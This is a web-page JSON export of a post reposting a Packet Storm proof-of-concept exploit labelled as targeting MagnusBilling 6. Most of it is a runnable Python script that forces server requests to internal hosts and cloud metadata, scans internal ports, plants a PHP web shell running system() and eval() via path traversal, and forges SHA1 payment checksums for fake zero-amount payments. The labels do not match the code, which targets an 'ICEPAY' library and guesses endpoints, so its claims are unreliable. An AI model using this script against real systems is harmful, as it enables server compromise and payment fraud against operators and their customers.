{"id":32692,"date":"2025-12-24T11:45:17","date_gmt":"2025-12-24T11:45:17","guid":{"rendered":"http:\/\/localhost\/?p=32692"},"modified":"2025-12-24T11:45:17","modified_gmt":"2025-12-24T11:45:17","slug":"magnusbilling-6-server-side-request-forgery-path-traversal","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=32692","title":{"rendered":"\ud83d\udcc4 MagnusBilling 6 Server-Side Request Forgery \/ Path Traversal_PACKETSTORM:213297"},"content":{"rendered":"

{“lastseen”:”2025-12-24T16:33:56″,”description”:”Proof of concept exploit for MagnusBilling 6 vulnerabilities including server-side request forgery, path traversal, and cryptographic weaknesses…”,”published”:”2025-12-24T00:00:00″,”modified”:”2025-12-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 MagnusBilling 6 Server-Side Request Forgery \/ Path Traversal”,”source”:””,”references”:””,”id”:”PACKETSTORM:213297″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-30258″],”sourceData”:”=============================================================================================================================================\\n | # Title : MagnusBilling 6 SSRF, Path Traversal, and Cryptographic Weaknesses |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/github.com\/magnussolution\/magnusbilling7 |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/190424\/ \\u0026\\tCVE-2023-30258\\n \\n [+] Summary : MagnusBilling 6 is a VoIP billing system with multiple critical security vulnerabilities that expose systems to complete compromise, financial fraud, and data breaches. \\n The system contains vulnerabilities across all layers including authentication bypass, SQL injection, command injection, and privilege escalation.\\n \\t\\t \\n [+] POC : python poc.py\\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import hashlib\\n import sys\\n import json\\n import time\\n import socket\\n import urllib.parse\\n from concurrent.futures import ThreadPoolExecutor\\n \\n class ICEPAYExploiter:\\n def __init__(self, target_url, merchant_id=None):\\n self.target_url = target_url.rstrip(‘\/’)\\n self.merchant_id = merchant_id or 12345\\n self.session = requests.Session()\\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’,\\n ‘Accept’: ‘application\/json, text\/html, *\/*’,\\n ‘Content-Type’: ‘application\/x-www-form-urlencoded’\\n })\\n \\n def detect_icepay_endpoints(self):\\n \\”\\”\\”Detect ICEPAY endpoints on target\\”\\”\\”\\n print(\\”[*] Scanning for ICEPAY endpoints…\\”)\\n \\n endpoints = [\\n ‘\/payment’, ‘\/pay’, ‘\/checkout’, ‘\/icepay’, ‘\/process’,\\n ‘\/api\/payment’, ‘\/api\/checkout’, ‘\/gateway’, ‘\/payment\/gateway’,\\n ‘\/index.php?page=payment’, ‘\/checkout.php’, ‘\/payment.php’\\n ]\\n \\n found = []\\n for endpoint in endpoints:\\n url = f\\”{self.target_url}{endpoint}\\”\\n try:\\n resp = self.session.get(url, timeout=5)\\n if resp.status_code \\u003c 400:\\n # Check for ICEPAY indicators\\n content_lower = resp.text.lower()\\n if ‘icepay’ in content_lower or ‘payment’ in content_lower:\\n print(f\\”[+] Found endpoint: {url} ({resp.status_code})\\”)\\n found.append(url)\\n except:\\n pass\\n \\n return found\\n \\n def exploit_ssrf_full(self, internal_target):\\n \\”\\”\\”\\n Full SSRF exploitation chain\\n \\”\\”\\”\\n print(f\\”\\\\n[+] Starting SSRF attack against: {internal_target}\\”)\\n \\n # Method 1: Direct API URL manipulation\\n print(\\”[*] Method 1: Direct API URL override\\”)\\n \\n payload = {\\n ‘ic_merchantid’: self.merchant_id,\\n ‘ic_amount’: ‘1000’,\\n ‘ic_currency’: ‘EUR’,\\n ‘ic_description’: ‘SSRF Test’,\\n ‘ic_country’: ‘NL’,\\n ‘ic_language’: ‘nl’,\\n ‘apiURL’: internal_target # Try to inject SSRF\\n }\\n \\n # Try various endpoints\\n test_endpoints = [\\n f\\”{self.target_url}\/payment\\”,\\n f\\”{self.target_url}\/checkout\\”,\\n f\\”{self.target_url}\/process\\”\\n ]\\n \\n for endpoint in test_endpoints:\\n try:\\n print(f\\” Testing: {endpoint}\\”)\\n resp = self.session.post(endpoint, data=payload, timeout=10)\\n \\n if resp.status_code == 200:\\n print(f\\” Status: {resp.status_code}\\”)\\n print(f\\” Response length: {len(resp.text)}\\”)\\n \\n # Check for internal data\\n if any(x in resp.text for x in [‘root:’, ‘mysql’, ‘redis’, ‘internal’]):\\n print(f\\”[\u2713] Internal data leaked!\\”)\\n print(f\\” Data: {resp.text[:500]}…\\”)\\n return True\\n \\n except requests.exceptions.Timeout:\\n print(f\\”[\u2713] Request timeout – service may be accessible\\”)\\n return True\\n except Exception as e:\\n print(f\\” Error: {e}\\”)\\n \\n # Method 2: Parameter pollution in redirect\\n print(\\”\\\\n[*] Method 2: Parameter pollution\\”)\\n \\n redirect_payloads = [\\n f\\”{internal_target}?param=test\\”,\\n f\\”http:\/\/localhost@{internal_target.replace(‘http:\/\/’, ”)}\\”,\\n f\\”http:\/\/127.0.0.1#@{internal_target.replace(‘http:\/\/’, ”)}\\”,\\n f\\”http:\/\/{urllib.parse.quote(internal_target)}\\”\\n ]\\n \\n for payload_url in redirect_payloads:\\n try:\\n test_data = {\\n ‘return_url’: payload_url,\\n ‘callback_url’: payload_url,\\n ‘notification_url’: payload_url,\\n ‘success_url’: payload_url,\\n ‘error_url’: payload_url\\n }\\n \\n for key, value in test_data.items():\\n resp = self.session.post(\\n f\\”{self.target_url}\/config\\”,\\n data={key: value},\\n timeout=8\\n )\\n if resp.status_code == 200:\\n print(f\\” {key} accepted: {payload_url}\\”)\\n \\n except:\\n pass\\n \\n # Method 3: DNS rebinding attack setup\\n print(\\”\\\\n[*] Method 3: DNS Rebinding potential\\”)\\n print(\\” If the app caches DNS, we can try DNS rebinding\\”)\\n print(\\” Set up a domain that resolves to:\\”)\\n print(f\\” 1. External IP (for validation)\\”)\\n print(f\\” 2. 127.0.0.1 (for actual attack)\\”)\\n \\n return False\\n \\n def exploit_path_traversal_logging(self, web_root_guess=None):\\n \\”\\”\\”\\n Exploit path traversal in logging functionality\\n \\”\\”\\”\\n print(\\”\\\\n[+] Exploiting Path Traversal in Logging\\”)\\n \\n # Common web roots\\n web_roots = [\\n ‘\/var\/www\/html’,\\n ‘\/var\/www’,\\n ‘\/usr\/local\/apache2\/htdocs’,\\n ‘\/srv\/http’,\\n ‘\/home\/user\/public_html’,\\n ‘C:\\\\\\\\xampp\\\\\\\\htdocs’,\\n ‘C:\\\\\\\\wamp\\\\\\\\www’,\\n ‘C:\\\\\\\\inetpub\\\\\\\\wwwroot’\\n ]\\n \\n if web_root_guess:\\n web_roots.insert(0, web_root_guess)\\n \\n # Traversal sequences\\n traversals = [‘..\/’, ‘..\\\\\\\\’, ‘..;\/’, ‘%2e%2e%2f’, ‘%252e%252e%252f’]\\n \\n # PHP web shell\\n web_shell = \\”\\”\\”\\u003c?php\\n if(isset($_GET[‘cmd’])) {\\n system($_GET[‘cmd’]);\\n }\\n if(isset($_POST[‘code’])) {\\n eval($_POST[‘code’]);\\n }\\n echo \\”WebShell Ready\\”;\\n ?\\u003e\\”\\”\\”\\n \\n successful_uploads = []\\n \\n for web_root in web_roots:\\n for traversal in traversals:\\n # Build path traversal payload\\n depth = 10\\n path = traversal * depth + web_root\\n \\n print(f\\” Testing: {path}\\”)\\n \\n # Try to set logging directory\\n set_logging_payload = {\\n ‘action’: ‘set_logging_dir’,\\n ‘directory’: path,\\n ‘enable_logging’: ‘1’,\\n ‘merchantID’: self.merchant_id\\n }\\n \\n # Try various endpoints\\n endpoints = [\\n f\\”{self.target_url}\/admin\/config\\”,\\n f\\”{self.target_url}\/config\/update\\”,\\n f\\”{self.target_url}\/settings\\”,\\n f\\”{self.target_url}\/api\/config\\”\\n ]\\n \\n for endpoint in endpoints:\\n try:\\n resp = self.session.post(endpoint, data=set_logging_payload, timeout=8)\\n \\n if resp.status_code \\u003c 400:\\n print(f\\” [+] Logging directory accepted at {endpoint}\\”)\\n \\n # Now trigger logging with PHP code\\n trigger_payload = {\\n ‘message’: web_shell,\\n ‘level’: ‘ERROR’,\\n ‘event’: ‘payment_failed’,\\n ‘merchantID’: self.merchant_id\\n }\\n \\n # Try to trigger logging\\n log_endpoints = [\\n f\\”{self.target_url}\/log\\”,\\n f\\”{self.target_url}\/payment\/error\\”,\\n f\\”{self.target_url}\/api\/log\\”\\n ]\\n \\n for log_endpoint in log_endpoints:\\n try:\\n resp2 = self.session.post(log_endpoint, data=trigger_payload, timeout=8)\\n \\n if resp2.status_code == 200:\\n print(f\\” [+] Logging triggered at {log_endpoint}\\”)\\n \\n # Try to access the shell\\n shell_filename = f\\”{self.target_url}\/#{time.strftime(‘%Y%m%d’)}.log\\”\\n check = self.session.get(shell_filename, timeout=5)\\n \\n if check.status_code == 200 and ‘WebShell Ready’ in check.text:\\n print(f\\”[\u2713] WebShell uploaded and accessible: {shell_filename}\\”)\\n successful_uploads.append(shell_filename)\\n \\n except:\\n pass\\n \\n except:\\n pass\\n \\n return successful_uploads\\n \\n def exploit_checksum_bypass(self):\\n \\”\\”\\”\\n Exploit weak SHA1 checksum validation\\n \\”\\”\\”\\n print(\\”\\\\n[+] Exploiting Weak Checksum Validation\\”)\\n \\n # ICEPAY checksum formula: sha1(secret|merchant|status|…)\\n # We’ll try to brute force or predict\\n \\n print(\\”[*] Testing for checksum prediction\\”)\\n \\n # Known weak secret patterns\\n weak_secrets = [\\n ‘test’, ‘secret’, ‘password’, ‘123456’, ‘icepay’,\\n ‘merchant’, ‘demo’, ‘admin’, ”, None\\n ]\\n \\n # Generate test postback\\n test_postback = {\\n ‘Status’: ‘OK’,\\n ‘Merchant’: str(self.merchant_id),\\n ‘OrderID’: ‘TEST123’,\\n ‘PaymentID’: ‘999999’,\\n ‘Amount’: ‘1000’,\\n ‘Currency’: ‘EUR’\\n }\\n \\n for secret_guess in weak_secrets:\\n # Recreate ICEPAY checksum\\n checksum_input = f\\”{secret_guess}|{test_postback[‘Merchant’]}|{test_postback[‘Status’]}|OK|{test_postback[‘OrderID’]}|{test_postback[‘PaymentID’]}|REF123|TXN123|{test_postback[‘Amount’]}|{test_postback[‘Currency’]}|0|127.0.0.1\\”\\n \\n checksum = hashlib.sha1(checksum_input.encode()).hexdigest()\\n \\n test_postback[‘Checksum’] = checksum\\n \\n print(f\\” Testing secret: {secret_guess}\\”)\\n print(f\\” Generated checksum: {checksum}\\”)\\n \\n # Try to submit postback\\n postback_endpoints = [\\n f\\”{self.target_url}\/postback\\”,\\n f\\”{self.target_url}\/notification\\”,\\n f\\”{self.target_url}\/callback\\”,\\n f\\”{self.target_url}\/api\/notify\\”\\n ]\\n \\n for endpoint in postback_endpoints:\\n try:\\n resp = self.session.post(endpoint, data=test_postback, timeout=10)\\n \\n if resp.status_code == 200:\\n print(f\\” [+] Postback accepted at {endpoint}\\”)\\n print(f\\” Response: {resp.text[:100]}\\”)\\n \\n if ‘success’ in resp.text.lower() or ‘ok’ in resp.text.lower():\\n print(f\\”[\u2713] Checksum bypass successful!\\”)\\n return True\\n \\n except:\\n pass\\n \\n # Try SHA1 collision (if we have example collision files)\\n print(\\”\\\\n[*] Testing SHA1 collision potential\\”)\\n \\n # Example from shattered.io\\n collision_pdf1 = \\”255044462d312e330a25e2e3cfd30a0a0a312030206f626a0a3c3c2f57696474682032203020522f4865696768742033203020522f547970652034203020522f537562747970652035203020522f46696c7465722036203020522f436f6c6f7253706163652037203020522f4c656e6774682038203020522f42697473506572436f6d706f6e656e7420383e3e0a73747265616d0affd8fffe00245348412d3120697320646561642121212121852fec092339759c39b1a1c63c4c97e1fffe017f46dc93a6b67e013b029aaa1db2560b45ca67d688c7f84b8c4c791fe02b3df614f86db1690901c56b45c1530afedfb76038e972722fe7ad728f0e4904e046c230570fe9d41398abe12ef5bc942be33542a4802d98b5d70f2a332ec37fac3514e74ddc0f2cc1a874cd0c78305a21566461309789606bd0bf3f98cda8044629a1\\”\\n collision_pdf2 = \\”255044462d312e330a25e2e3cfd30a0a0a312030206f626a0a3c3c2f57696474682032203020522f4865696768742033203020522f547970652034203020522f537562747970652035203020522f46696c7465722036203020522f436f6c6f7253706163652037203020522f4c656e6774682038203020522f42697473506572436f6d706f6e656e7420383e3e0a73747265616d0affd8fffe00245348412d3120697320646561642121212121852fec092339759c39b1a1c63c4c97e1fffe017346dc9166b67e118f029ab621b2560ff9ca67cca8c7f85ba84c79030c2b3de218f86db3a90901d5df45c14f26fedfb3dc38e96ac22fe7bd728f0e45bce046d23c570feb141398bb552ef5a0a82be331fea48037b8b5d71f0e332edf93ac3500eb4ddc0decc1a864790c782c76215660dd309791d06bd0af3f98cda4bc4629b1\\”\\n \\n hash1 = hashlib.sha1(bytes.fromhex(collision_pdf1)).hexdigest()\\n hash2 = hashlib.sha1(bytes.fromhex(collision_pdf2)).hexdigest()\\n \\n print(f\\” Collision PDF 1 SHA1: {hash1}\\”)\\n print(f\\” Collision PDF 2 SHA1: {hash2}\\”)\\n \\n if hash1 == hash2:\\n print(\\”[\u2713] SHA1 collision confirmed\\”)\\n print(\\” Can create two different payment confirmations with same checksum\\”)\\n \\n return False\\n \\n def exploit_race_condition(self):\\n \\”\\”\\”\\n Exploit potential race conditions in file operations\\n \\”\\”\\”\\n print(\\”\\\\n[+] Testing for Race Conditions\\”)\\n \\n # If multiple requests process payments simultaneously\\n print(\\”[*] Testing concurrent payment processing\\”)\\n \\n def make_payment_request(i):\\n data = {\\n ‘merchantID’: self.merchant_id,\\n ‘amount’: ‘100’,\\n ‘orderID’: f’RACE{i}’,\\n ‘currency’: ‘EUR’\\n }\\n \\n try:\\n resp = self.session.post(f\\”{self.target_url}\/payment\\”, data=data, timeout=15)\\n return f\\”Request {i}: {resp.status_code}\\”\\n except Exception as e:\\n return f\\”Request {i}: Error – {e}\\”\\n \\n # Send concurrent requests\\n with ThreadPoolExecutor(max_workers=10) as executor:\\n futures = [executor.submit(make_payment_request, i) for i in range(10)]\\n results = [f.result() for f in futures]\\n \\n for result in results:\\n print(f\\” {result}\\”)\\n \\n # Check for duplicate payments or inconsistent states\\n print(\\”\\\\n[*] Checking for duplicate transaction IDs\\”)\\n \\n return False\\n \\n def internal_network_scan(self):\\n \\”\\”\\”\\n Use SSRF to scan internal network\\n \\”\\”\\”\\n print(\\”\\\\n[+] Internal Network Scan via SSRF\\”)\\n \\n # Common internal services\\n services = [\\n (‘mysql’, 3306),\\n (‘redis’, 6379),\\n (‘mongodb’, 27017),\\n (‘postgres’, 5432),\\n (‘memcached’, 11211),\\n (‘elasticsearch’, 9200),\\n (‘rabbitmq’, 5672),\\n (‘ftp’, 21),\\n (‘ssh’, 22),\\n (‘rdp’, 3389)\\n ]\\n \\n # Common internal IP ranges\\n ip_ranges = [\\n ‘127.0.0.1’,\\n ‘192.168.1.{}’,\\n ‘10.0.0.{}’,\\n ‘172.16.0.{}’,\\n ‘192.168.0.{}’,\\n ‘10.10.10.{}’\\n ]\\n \\n discovered = []\\n \\n for ip_template in ip_ranges[:2]: # Limit for demo\\n for i in range(1, 5): # First few IPs\\n ip = ip_template.format(i)\\n \\n for service, port in services[:5]: # First few services\\n target = f\\”http:\/\/{ip}:{port}\\”\\n \\n # Use the payment API to probe\\n probe_data = {\\n ‘apiURL’: target,\\n ‘ic_merchantid’: self.merchant_id,\\n ‘ic_amount’: ‘100’\\n }\\n \\n try:\\n resp = self.session.post(\\n f\\”{self.target_url}\/payment\/test\\”,\\n data=probe_data,\\n timeout=3\\n )\\n \\n # Analyze response\\n if resp.status_code != 500: # Different from normal error\\n print(f\\” Found: {ip}:{port} ({service}) – Status: {resp.status_code}\\”)\\n discovered.append((ip, port, service))\\n \\n except requests.exceptions.Timeout:\\n print(f\\” Service may exist: {ip}:{port} (timeout)\\”)\\n discovered.append((ip, port, service))\\n except:\\n pass\\n \\n return discovered\\n \\n def comprehensive_exploit(self):\\n \\”\\”\\”\\n Run all exploitation techniques\\n \\”\\”\\”\\n print(\\”=\\” * 70)\\n print(\\”ICEPAY LIBRARY – COMPREHENSIVE EXPLOITATION POC\\”)\\n print(\\”=\\” * 70)\\n \\n results = {\\n ‘endpoints’: [],\\n ‘ssrf_vulnerable’: False,\\n ‘path_traversal_success’: [],\\n ‘checksum_bypass’: False,\\n ‘internal_services’: [],\\n ‘race_conditions’: False\\n }\\n \\n # Step 1: Discover endpoints\\n results[‘endpoints’] = self.detect_icepay_endpoints()\\n \\n if not results[‘endpoints’]:\\n print(\\”[-] No ICEPAY endpoints found\\”)\\n return results\\n \\n # Step 2: SSRF attacks\\n ssrf_targets = [\\n ‘http:\/\/localhost:8080\/admin’,\\n ‘http:\/\/127.0.0.1:3306’, # MySQL\\n ‘http:\/\/169.254.169.254\/latest\/meta-data\/’, # AWS\\n ‘file:\/\/\/etc\/passwd’\\n ]\\n \\n for target in ssrf_targets:\\n if self.exploit_ssrf_full(target):\\n results[‘ssrf_vulnerable’] = True\\n break\\n \\n # Step 3: Path Traversal\\n results[‘path_traversal_success’] = self.exploit_path_traversal_logging()\\n \\n # Step 4: Checksum Bypass\\n results[‘checksum_bypass’] = self.exploit_checksum_bypass()\\n \\n # Step 5: Internal Network Scan (if SSRF works)\\n if results[‘ssrf_vulnerable’]:\\n results[‘internal_services’] = self.internal_network_scan()\\n \\n # Step 6: Race Conditions\\n results[‘race_conditions’] = self.exploit_race_condition()\\n \\n # Print summary\\n print(\\”\\\\n\\” + \\”=\\” * 70)\\n print(\\”EXPLOITATION SUMMARY\\”)\\n print(\\”=\\” * 70)\\n \\n print(f\\”\u2713 Endpoints Found: {len(results[‘endpoints’])}\\”)\\n print(f\\”\u2713 SSRF Vulnerable: {results[‘ssrf_vulnerable’]}\\”)\\n print(f\\”\u2713 Path Traversal: {len(results[‘path_traversal_success’])} successful\\”)\\n print(f\\”\u2713 Checksum Bypass: {results[‘checksum_bypass’]}\\”)\\n print(f\\”\u2713 Internal Services Found: {len(results[‘internal_services’])}\\”)\\n print(f\\”\u2713 Race Conditions: {results[‘race_conditions’]}\\”)\\n \\n if results[‘path_traversal_success’]:\\n print(\\”\\\\n[+] WebShells accessible at:\\”)\\n for shell in results[‘path_traversal_success’]:\\n print(f\\” {shell}?cmd=whoami\\”)\\n \\n return results\\n \\n # Standalone exploit functions\\n def standalone_ssrf_exploit():\\n \\”\\”\\”Quick SSRF exploit for specific target\\”\\”\\”\\n print(\\”[+] Standalone SSRF Exploit\\”)\\n \\n # Change these values\\n TARGET_URL = \\”http:\/\/victim.com\/payment\/process\\”\\n INTERNAL_TARGET = \\”http:\/\/localhost:8080\/admin\\”\\n \\n exploit_data = {\\n ‘ic_merchantid’: ‘12345’,\\n ‘ic_amount’: ‘1000’,\\n ‘ic_currency’: ‘EUR’,\\n ‘ic_country’: ‘NL’,\\n ‘ic_language’: ‘nl’,\\n ‘apiURL’: INTERNAL_TARGET,\\n ‘chk’: ‘bypassed_checksum’\\n }\\n \\n try:\\n resp = requests.post(TARGET_URL, data=exploit_data, timeout=10)\\n print(f\\”Status: {resp.status_code}\\”)\\n print(f\\”Response: {resp.text[:500]}\\”)\\n \\n if resp.status_code == 200:\\n print(\\”[\u2713] SSRF successful!\\”)\\n except Exception as e:\\n print(f\\”Error: {e}\\”)\\n \\n def generate_malicious_checksum():\\n \\”\\”\\”Generate malicious ICEPAY checksum\\”\\”\\”\\n print(\\”[+] Generating malicious ICEPAY checksum\\”)\\n \\n # ICEPAY checksum formula: sha1(secret|merchant|status|statusCode|orderID|paymentID|reference|transactionID|amount|currency|duration|consumerIPAddress)\\n \\n secret = \\”weaksecret\\” # Default\/weak secret\\n postback_data = {\\n ‘Status’: ‘OK’,\\n ‘Merchant’: ‘12345’,\\n ‘OrderID’: ‘HACKED01’,\\n ‘PaymentID’: ‘999999’,\\n ‘Reference’: ‘EXPLOIT’,\\n ‘TransactionID’: ‘TXN_HACK’,\\n ‘Amount’: ‘0’, # Try to get free payment\\n ‘Currency’: ‘EUR’,\\n ‘Duration’: ‘0’,\\n ‘ConsumerIPAddress’: ‘127.0.0.1’\\n }\\n \\n checksum_input = f\\”{secret}|{postback_data[‘Merchant’]}|OK|OK|{postback_data[‘OrderID’]}|{postback_data[‘PaymentID’]}|{postback_data[‘Reference’]}|{postback_data[‘TransactionID’]}|{postback_data[‘Amount’]}|{postback_data[‘Currency’]}|{postback_data[‘Duration’]}|{postback_data[‘ConsumerIPAddress’]}\\”\\n \\n checksum = hashlib.sha1(checksum_input.encode()).hexdigest()\\n \\n print(f\\”Checksum Input: {checksum_input}\\”)\\n print(f\\”Generated Checksum: {checksum}\\”)\\n \\n # Complete postback payload\\n postback_data[‘Checksum’] = checksum\\n postback_data[‘StatusCode’] = ‘OK’\\n \\n print(\\”\\\\nFull Postback Payload:\\”)\\n print(json.dumps(postback_data, indent=2))\\n \\n return postback_data\\n \\n if __name__ == \\”__main__\\”:\\n if len(sys.argv) \\u003c 2:\\n print(\\”Usage:\\”)\\n print(\\” Full scan: python icepay_exploit.py \\u003ctarget_url\\u003e\\”)\\n print(\\” Quick SSRF: python icepay_exploit.py –ssrf \\u003ctarget_url\\u003e \\u003cinternal_url\\u003e\\”)\\n print(\\” Generate checksum: python icepay_exploit.py –checksum\\”)\\n sys.exit(1)\\n \\n if sys.argv[1] == \\”–ssrf\\”:\\n if len(sys.argv) \\u003c 4:\\n print(\\”Usage: python icepay_exploit.py –ssrf \\u003ctarget\\u003e \\u003cinternal_url\\u003e\\”)\\n sys.exit(1)\\n \\n target = sys.argv[2]\\n internal = sys.argv[3]\\n \\n exploiter = ICEPAYExploiter(target)\\n exploiter.exploit_ssrf_full(internal)\\n \\n elif sys.argv[1] == \\”–checksum\\”:\\n generate_malicious_checksum()\\n \\n elif sys.argv[1] == \\”–path-traversal\\”:\\n if len(sys.argv) \\u003c 3:\\n print(\\”Usage: python icepay_exploit.py –path-traversal \\u003ctarget\\u003e\\”)\\n sys.exit(1)\\n \\n target = sys.argv[2]\\n exploiter = ICEPAYExploiter(target)\\n exploiter.exploit_path_traversal_logging()\\n \\n else:\\n target = sys.argv[1]\\n exploiter = ICEPAYExploiter(target)\\n exploiter.comprehensive_exploit()\\n \\t\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213297″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213297\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-24T16:33:56″,”description”:”Proof of concept exploit for MagnusBilling 6 vulnerabilities including server-side request forgery, path traversal, and cryptographic weaknesses…”,”published”:”2025-12-24T00:00:00″,”modified”:”2025-12-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 MagnusBilling 6 Server-Side Request Forgery \/ Path Traversal”,”source”:””,”references”:””,”id”:”PACKETSTORM:213297″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-30258″],”sourceData”:”=============================================================================================================================================\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-32692","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 MagnusBilling 6 Server-Side Request Forgery \/ Path Traversal_PACKETSTORM:213297 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=32692\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 MagnusBilling 6 Server-Side Request Forgery \/ Path Traversal_PACKETSTORM:213297 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-24T16:33:56″,”description”:”Proof of concept exploit for MagnusBilling 6 vulnerabilities including server-side request forgery, path traversal, and cryptographic weaknesses…”,”published”:”2025-12-24T00:00:00″,”modified”:”2025-12-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 MagnusBilling 6 Server-Side Request Forgery \/ Path Traversal”,”source”:””,”references”:””,”id”:”PACKETSTORM:213297″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-30258″],”sourceData”:”=============================================================================================================================================n...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=32692\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-24T11:45:17+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32692#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32692\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 MagnusBilling 6 Server-Side Request Forgery \\\/ Path Traversal_PACKETSTORM:213297\",\"datePublished\":\"2025-12-24T11:45:17+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32692\"},\"wordCount\":2992,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32692#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32692\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32692\",\"name\":\"\ud83d\udcc4 MagnusBilling 6 Server-Side Request Forgery \\\/ Path Traversal_PACKETSTORM:213297 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-24T11:45:17+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32692#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32692\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32692#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 MagnusBilling 6 Server-Side Request Forgery \\\/ Path Traversal_PACKETSTORM:213297\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero 